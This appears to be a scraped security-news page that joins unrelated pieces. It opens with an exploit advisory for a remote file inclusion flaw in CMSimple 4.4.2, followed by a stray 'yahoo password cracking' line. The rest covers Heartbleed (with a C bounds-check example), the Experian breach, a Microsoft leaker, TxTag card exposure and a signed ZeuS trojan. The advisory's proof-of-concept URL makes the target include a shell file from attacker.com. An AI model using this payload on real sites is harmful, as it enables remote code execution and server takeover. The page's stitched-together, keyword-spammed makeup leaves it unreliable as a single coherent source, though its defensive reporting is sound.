[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : CMSimple is a PHP based Content Management System (CMS), which requires no database. All data is stored in a simple file system.

[o] Vulnerable File

plugins/filebrowser/classes/required_classes.php

require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';

[o] Exploit

http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]

[o] PoC

http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?

yahoo password cracking

A major new security vulnerability dubbed Heartbleed was disclosed Monday night with severe implications for the entire Web. The bug can scrape a server's memory, where sensitive user data is stored, including private data such as usernames, passwords, and credit card numbers.
It's an extremely serious issue, affecting some 500,000 Web sites, according to Netcraft, an Internet research firm. Here's what you can do to make sure your information is protected, according to security experts contacted by CNET:
Do not log into accounts from afflicted sites until you're sure the company has patched the problem. If the company hasn't been forthcoming -- confirming a fix or keeping you up to date with progress -- reach out to its customer service teams for information, said John Miller, security research manager for TrustWave, a security and compliance firm.
Some Web sites that appeared to have been affected included Yahoo and OKCupid, though the companies have said their sites are all or partly fixed (see below for details). You can check sites on an individual basis here, though caution is still advised even if the site gives you an "all clear" indication. If you're given a red flag, avoid the site for now. (Editors' note, April 10: Check our constantly updating list of the top 100 Web sites and their Heartbleed patch status.)
The natural response might be to want to change passwords immediately, but security experts suggest waiting for confirmation of a fix because further activity on a vulnerable site could exacerbate the problem.
Once you've got confirmation of a security patch, change passwords of sensitive accounts like banks and email first. Even if you've implemented two-factor authentication -- which, in addition to a password asks for another piece of identifying information, like a code that's been texted to you -- changing that password is recommended.
Don't be shy about reaching out to small businesses that have your data to make sure they are secure. While the high-profile companies like Yahoo and Imgur certainly know about the problem, small businesses might not even be aware of it, said TrustWave's Miller. Be proactive about making sure your information is safe.
Keep a close eye on financial statements for the next few days. Because attackers can access a server's memory for credit card information, it wouldn't hurt to be on the lookout for unfamiliar charges on your bank statements.
Even after following these guidelines, there is still some riskiness in surfing the Web in the wake of the bug. Heartbleed is even said to affect browser cookies, which track users' activity on a site, so even visiting a vulnerable site without logging in could be unsafe. The Tor Project, which stresses anonymity and privacy, wrote in a blog post that users with those needs "might want to stay away from the Internet entirely for the next few days while things settle."
"I encourage users to not log in into [Yahoo] and other services that are affected since the credentials could have been leaked if they used the service," said Jaime Blasco, director of AlienVault Labs, a security research firm. "As soon as Yahoo solves the issue, it will be helpful if users change their password just in case." Yahoo seems to be the largest Web site to have been vulnerable to the bug (preliminary tests for Facebook, Google, and Twitter's Web sites said they appear to be safe). The company said that it has "successfully made appropriate corrections" to the main Yahoo properties: Yahoo Homepage, Search, Mail, Finance, Sports, Food, Tech, Flickr and Tumblr. Still, a Yahoo spokesperson said the company is still working to make the fix across the rest of the Yahoo sites.
Yahoo has been stressing authentication of late, so that the company would be able to provide a more personalized experience to users, a drum CEO Marissa Mayer has been beating almost since she took over the company. Yahoo provides services like email and fantasy sports, requiring passwords to get access to the applications.
The company has already had some trouble in the security arena. In January, the company had to reset the passwords of some email users after an attempted attack on a third-party's database. In response to the Heartbleed bug, some users have already expressed their outrage on Twitter. Brandon Oxford, from Royal, Ark., wrote: "After this I'm officially done with Yahoo email. I've now set up a Gmail. They seem to be more on top of stuff than Yahoo."
Other companies that were said to be affected chimed in as well. Imgur, the photo-sharing site popular with Reddit users, said: "[We] invalidated sensitive data such as cookies and session IDs, just to be on the safe side. We're proceeding with caution, since the nature of the attack makes it hard to detect, but we have no reason to believe it has been used against Imgur." OKCupid said, "The fix is now fully live on OKCupid."
The question in the aftermath of something like this is whether Web companies will reform their security practices. There has been a move toward Perfect Forward Secrecy (PFS) by many of the major Web companies, but not all of them have implemented the practice. PFS means essentially that encryption keys get a very short shelf life, and are not used forever. "People should want their communications to be secure as possible. PFS is one thing they can push for in the future," said Miller.

OpenSSL Heartbleed vulnerability CVE 2014 0160

If you are running a web server with OpenSSL 1.0.1 through 1.0.1f, it is extremely important that you update to OpenSSL 1.0.1g immediately, or as soon as possible.

As of this afternoon, an extremely critical programming flaw in OpenSSL has been discovered that apparently exposes the cryptographic keys and private data of some of the most important sites and services on the Internet.

The bug was independently discovered by security firm Codenomicon and a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library, and it allows cyber criminals to steal information that, under normal conditions, is protected by the SSL (Secure Sockets Layer) or TLS (Transport Layer Security) encryption used to secure the Internet.

OpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Almost every website uses either SSL or TLS, and the Apache web server, which powers almost half of the websites on the Internet, uses OpenSSL.

HEARTBLEED BUG
The discoverers of the vulnerability dubbed it the ‘Heartbleed bug’, since the exploit rests on a bug in the implementation of OpenSSL’s TLS/DTLS (transport layer security protocols) heartbeat extension (RFC 6520).

This critical bug, tracked as CVE-2014-0160, could allow an attacker to expose up to 64kB of memory from a server or a connected client running a vulnerable version of OpenSSL. In practice, this means that an attacker can steal keys, passwords and other private information remotely.
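The heartbeat message layout and the missing bounds check described above, as an added C example (not code from the original post or from OpenSSL). It assumes the RFC 6520 layout (1-byte type, 2-byte big-endian payload length, payload, at least 16 bytes of padding), zero-fills padding for determinism, and shows the validation a fixed implementation performs alongside a calculation of how far past the record an unchecked implementation would read:

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* RFC 6520 heartbeat message: 1-byte type, 2-byte big-endian
 * payload_length, payload, then at least 16 bytes of padding. */
#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_HEADER   3
#define HB_PADDING  16
/* The payload length the peer claims in the header (0 if no header). */
size_t hb_claimed_length(const unsigned char *rec, size_t rec_len) {
    if (rec_len < HB_HEADER) return 0;
    return ((size_t)rec[1] << 8) | rec[2];
}

/* The check the fix adds: claimed payload + header + minimum padding
 * must fit inside the record actually received. */
int hb_is_well_formed(const unsigned char *rec, size_t rec_len) {
    if (rec_len < HB_HEADER + HB_PADDING) return 0;
    if (rec[0] != HB_REQUEST && rec[0] != HB_RESPONSE) return 0;
    return HB_HEADER + hb_claimed_length(rec, rec_len) + HB_PADDING <= rec_len;
}
/* Bytes past the end of the record that code WITHOUT that check would
 * copy into its reply, because it trusts the claimed length. */
size_t hb_unchecked_overread(const unsigned char *rec, size_t rec_len) {
    size_t claimed = hb_claimed_length(rec, rec_len);
    size_t available = rec_len > HB_HEADER ? rec_len - HB_HEADER : 0;
    return claimed > available ? claimed - available : 0;
}

/* Build the response for a validated request; returns bytes written or
 * -1. Padding is zero-filled here for determinism (OpenSSL randomises). */
int hb_build_response(const unsigned char *req, size_t req_len,
                      unsigned char *out, size_t out_cap) {
    if (!hb_is_well_formed(req, req_len)) return -1;
    size_t claimed = hb_claimed_length(req, req_len);
    size_t need = HB_HEADER + claimed + HB_PADDING;
    if (need > out_cap) return -1;
    out[0] = HB_RESPONSE; out[1] = req[1]; out[2] = req[2];
    memcpy(out + HB_HEADER, req + HB_HEADER, claimed); /* only bytes that exist */
    memset(out + HB_HEADER + claimed, 0, HB_PADDING);
    return (int)need;
}

int main(void) {
    /* Constructed samples: 5-byte payload "hello" plus 16 zero padding bytes;
     * the second one claims a 65535-byte payload it does not carry. */
    unsigned char honest[3 + 5 + 16] = {HB_REQUEST, 0x00, 0x05, 'h', 'e', 'l', 'l', 'o'};
    unsigned char lying[3 + 5 + 16]  = {HB_REQUEST, 0xFF, 0xFF, 'h', 'e', 'l', 'l', 'o'};
    printf("honest: ok=%d overread=%zu\n", hb_is_well_formed(honest, sizeof honest), hb_unchecked_overread(honest, sizeof honest));
    printf("lying:  ok=%d overread=%zu\n", hb_is_well_formed(lying, sizeof lying), hb_unchecked_overread(lying, sizeof lying));
    return 0;
}
```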

"We have tested some of our own services from attacker’s perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able to steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication."

The vulnerability in the heartbeat section of OpenSSL’s transport layer security (TLS) protocol implementation has been in the wild since March 2012 and is thought to be even more dangerous than Apple’s recent SSL bug, which opened the possibility of man-in-the-middle (MitM) attacks.

Because the Heartbleed bug reveals encryption keys that could lead to further compromises, it affects past traffic as well, and may affect as much as 66 percent of websites on the Internet. 10 of the top 1000 sites are vulnerable to this flaw, including Yahoo Mail, LastPass and the FBI site. A proof-of-concept exploit for the flaw has also been posted on Github. On this website, you can check whether your web server is vulnerable.

"Bugs in single software or library come and go and are fixed by new versions," the researchers who discovered the vulnerability wrote in a blog post published Monday. "However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously."

Fixes for the bug have been released by the researchers. Those running OpenSSL 1.0.1f should update to OpenSSL 1.0.1g. Users running versions older than the 1.0.1 branch are not affected.



According to reports, a multistate investigation has been launched, after an Experian subsidiary, Court Ventures, was struck by a breach impacting more than 200 million Americans.
On Thursday, Reuters reported that attorneys general in Connecticut, Illinois, and potentially other states, planned to look into a major identity theft case where sensitive information, including Social Security numbers, addresses, dates of birth, phone numbers and email addresses of consumers, was exposed to criminals.
In October, security journalist Brian Krebs detailed how Experian indirectly sold consumer data to an ID theft service run by a Vietnamese national, Hieu Minh Ngo. Court documents revealed that Ngo, posing as a private investigator, paid Court Ventures so he could access sensitive database information available to the firm.
Last month, Ngo pleaded guilty in a federal New Hampshire court to devising the scheme.
According to the Thursday Reuters report, state investigations will likely center on whether credit bureau Experian and other involved companies followed proper data security and breach disclosure laws.
On Friday, Jaclyn Falkowski, a spokeswoman for the Connecticut Attorney General's office, confirmed with SCMagazine.com via phone that “Connecticut will be inquiring on the breach,” but that the office had “no further comment” on the matter.
That day, Maura Possley, a spokeswoman for the Illinois Attorney General's office, told SCMagazine.com that its probe was “part of a multistate investigation.”
“We are investigating based on reports of a data breach involving Experian,” Possley said.


A former Microsoft employee has pleaded guilty to charges related to sharing software code for upcoming company products.
On March 17 federal prosecutors charged Alex Kibkalo for handing the trade secrets over to an unknown technology blogger, who then proceeded to release the company software code online, according to court documents.
Kibkalo originally faced up to 10 years in prison as well as a fine of up to $250,000, but according to Monday's plea agreement, he and prosecutors recommended a three-month prison term and a fine of $22,500 to the court.
In order to find out who was supplying the code, Microsoft searched the blogger's Hotmail account, a service provided by the tech giant. This move gained attention from privacy advocates, which prompted the company to change its policy related to cases like this, according to the Wall Street Journal.

TxDOT TxTag Credit card hacked

Do you know why another major company is getting hacked every week? Poor policies, lazy incident response, and a lack of will to put effort into applying important patches.

Some companies are simply not taking their security seriously, and the best example of this is TxTag, the electronic toll collection system in Texas operated by the Texas Department of Transportation (TxDOT).

1.2 MILLION CREDIT CARDS ARE AT RISK
Security researcher David Longenecker reported a serious flaw in the TxTag website that exposes the active credit card details and personal information of 1.2 million drivers, including active TxTags (vehicle stickers with microchips, which are scanned by electronic readers on toll roads), names, phone numbers, full residence addresses and email addresses, along with their complete credit card numbers and expiration dates.

According to David, account names are easily predictable by anyone: an account name is typically an 8-digit number that begins with 2, and it is protected by only a 4-digit PIN, which is itself another easy factor to abuse.
But their stupidity didn’t end there. To make matters worse for users, TxTag.org inexplicably stores the complete credit card details, including the card number and expiration date. These are meant to be only partially visible to the user, but the full values are present in plaintext as the value of an input field in the page source code.
"I have no indication credit cards have actually been stolen. I merely found and reported a flaw that could very easily be exploited to obtain this information," he said.

NO LESSONS LEARNED FROM PREVIOUS CYBER ATTACK
The Texas Department of Transportation had not learned any lesson from its past experiences with hackers. Exactly two years ago, TxDOT itself confirmed a "cyber attack" in which hackers overloaded the TxTag back-office account servers, but according to TxTag, no accounts were compromised at the time.

In a 2012 statement, TxDOT spokesperson Karen Amacker said, "Customer service and information security are of paramount importance to TxDOT. Cyberattackers recently tried to get into TxTag.org, but were not successful. All of our customers' information, including credit card information, remains secure."

But this so-called paramount importance of security appears to be an empty claim, as TxDOT did nothing to improve the security of its users' data after facing an attack.

FLAW REPORTED, BUT NO RESPONSE YET
The researcher reported the flaw, but neither TxTag nor TxDOT has so far responded to any of his requests for comment.

"The problem lies in the AutoPay Method screen. If you do not have a credit card or bank account stored for automatic payments, then financial data cannot be stolen through this manner," David said.

No one is safe when malicious hackers are out to do damage. Don't be lazy with your passwords: set long, hard-to-guess passwords, and don't store information online that you don’t absolutely need to. Stay tuned, stay safe.



A variant of the bank-account-raiding ZeuS Trojan is masquerading as a legit Windows app using a valid digital signature – and packs a rootkit to burrow deep into victims' PCs.
It appears miscreants have somehow gained access to the private signing certificate belonging to a Microsoft-registered developer, and used it to cryptographically sign the malware's executable. This cert should be kept a closely guarded secret.

The Windows operating system and antivirus tools can check the validity of a program's digital signature before trusting it, because an invalid signature indicates the code has been tampered with in transit, for instance. By generating a valid signature for the ZeuS Trojan, crims can dress the software nasty up as a legit application.

It's a sign that crooks are adopting tactics used by sophisticated espionage software, such as Flame: signing binaries to slip code onto victims' machines is part and parcel of modern-day cyber-spying. The use of stolen certs by criminals is rare but not unprecedented.

Researchers at SSL-certificate flogger Comodo, using telemetry collected from users of its security software, detected 200 installs of this latest ZeuS variant.

ZeuS (aka Zbot) is typically distributed by hackers planting malicious code on legitimate websites, which exploits browser bugs to install the nasty, or through email phishing that tricks netizens into running attachments.

The malware discovered by Comodo presented itself as a web page with the Internet Explorer logo on it, whereas it's really a malicious signed executable that drops an installer on the hard drive, which in turn tries to download a rootkit from the web. This is decrypted into a driver and lined up to execute early in the PC's boot sequence, meaning it can get to work hiding the Trojan from the rest of the operating system and applications, particularly tools that try to remove the Trojan.

When running, the software's goal is to intercept usernames and passwords, credit card numbers and other highly sensitive personal information submitted through website forms – particularly those on banking websites – and siphon the data off to crooks to exploit.

Richard Moulds, veep of product strategy at Thales e-Security, said that the digitally signed ZeuS binary undermines the system of trust that Windows and other operating systems rely on.
"Windows, iOS, Android, and Linux all use code signing to ensure that only legitimate, signed code is installed and executed," Moulds explained. "Code-signing provides the best mechanism for proving that code hasn’t been modified and therefore is a way of spotting malware infected software and rejecting it. If an attacker can sign their malicious code in a way that passes this validation process they are a huge step further in mounting an attack."
